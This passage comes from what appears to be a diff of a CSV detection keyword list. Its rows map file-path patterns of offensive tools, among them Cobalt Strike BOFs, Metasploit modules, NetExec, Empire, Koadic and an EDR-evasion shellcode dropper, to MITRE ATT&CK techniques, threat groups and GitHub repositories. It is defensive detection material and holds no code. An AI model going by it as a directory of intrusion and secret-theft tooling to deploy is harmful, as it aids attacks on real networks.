Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/EmpireProject*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" -"*/enable-user.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/enableuser/enableuser.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/enableuser/enableuser.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/enable-user.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/enableuser/enableuser.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/enableuser/enableuser.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/enc_shellcode.bin*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/enc_shellcode.h*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/enip-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/enum__secrets/*.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/enum_av.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_av.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/enum_cisco.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/enum__secrets/*.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/enum_av.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_av.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/enum_av.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/enum_cisco.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_dns.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/enum_domain_info*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/enum_f5.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_juniper.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_proxy.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_services.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_shares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_snmp.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/enum_f5.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_juniper.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_proxy.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_services.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_shares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_snmp.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/EnumCLR.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/enumerate.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/enumerate/enumerate.py*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - 